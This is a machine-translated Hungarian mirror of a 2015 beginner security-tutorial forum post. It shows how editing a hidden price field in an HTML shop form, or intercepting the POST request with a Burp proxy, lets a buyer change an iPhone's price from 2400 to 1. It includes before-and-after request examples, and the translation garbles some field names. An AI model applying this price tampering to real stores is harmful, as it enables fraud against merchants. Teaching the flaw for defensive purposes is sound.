Ez a cikk egy tükör gépi fordítás, kérjük, kattintson ide, hogy ugorjon az eredeti cikkre.

Nézet: 12586|Válasz: 0

[Biztonsági oktató] Intruzió behatolás: HTTP fejlécek alkalmazása

[Linket másol]
Közzétéve 2015. 02. 07. 17:59:07 | | |

Az HTTP fejlécek alkalmazásáról

A http fejlécet gyakran használják weboldalak továbbítási mechanizmusában, de a legtöbb kínai kezdő nem vette észre ezt a darabot, ez a cikk csak kezdőknek szól, a http fejléc szerepéről a behatolási folyamatban.

Vegyük példaként a vásárlási oldalt, hogy elemezzük a HTTP fejlécek szerepének egy kis részét.

Először is elemezzünk egy űrlapot a vásárlási oldalon.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="hidden" name="price" value="449">

<input type="submit" value="Purchase">

</form>

A megnyitó folyamat során készíts képernyőképet a http üzenet fejlécéről, és nézd meg

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

mennyiség=1&ár=2400

Bár az ármező nem jelenik meg az oldalon a vásárlási oldal megnyitásakor, a felhasználó még mindig szerkesztheti és kezelheti.

Kétféleképpen lehet a szerkesztést elérni

1. Mentsd el a HTML forráskódot módosításhoz, majd töltsd be újra a böngészőbe a futtatáshoz

2. Használjon proxy interceptiont HTTP fejlécek módosításához (proxy építése a tool burp-ban)

Vegyük például a fenti HTTP fejlécet
A változás előtt
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

mennyiség=1&ár=2400

A változás után
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

mennyiség=1&ár=1


Az utolsó sorban az ár értéke 2400, és ha 1-re változtatjuk, olcsóbban is megkaphatjuk az iPhone 4S-et.

Ez a cikk csak egy képet ad váratlan előnyökről, mint például az LDAP injekció.




Előző:MySQL elfelejtett jelszó-visszaállítási jelszó-megvalósítási módszer
Következő:SQL injekció a teljes weboldal út eléréséhez
Lemondás:
A Code Farmer Network által közzétett összes szoftver, programozási anyag vagy cikk kizárólag tanulási és kutatási célokra szolgál; A fenti tartalmat nem szabad kereskedelmi vagy illegális célokra használni, különben a felhasználók viselik az összes következményet. Az oldalon található információk az internetről származnak, és a szerzői jogi vitáknak semmi köze ehhez az oldalhoz. A fenti tartalmat a letöltés után 24 órán belül teljesen törölni kell a számítógépéről. Ha tetszik a program, kérjük, támogassa a valódi szoftvert, vásároljon regisztrációt, és szerezzen jobb hiteles szolgáltatásokat. Ha bármilyen jogsértés történik, kérjük, vegye fel velünk a kapcsolatot e-mailben.

Mail To:help@itsvse.com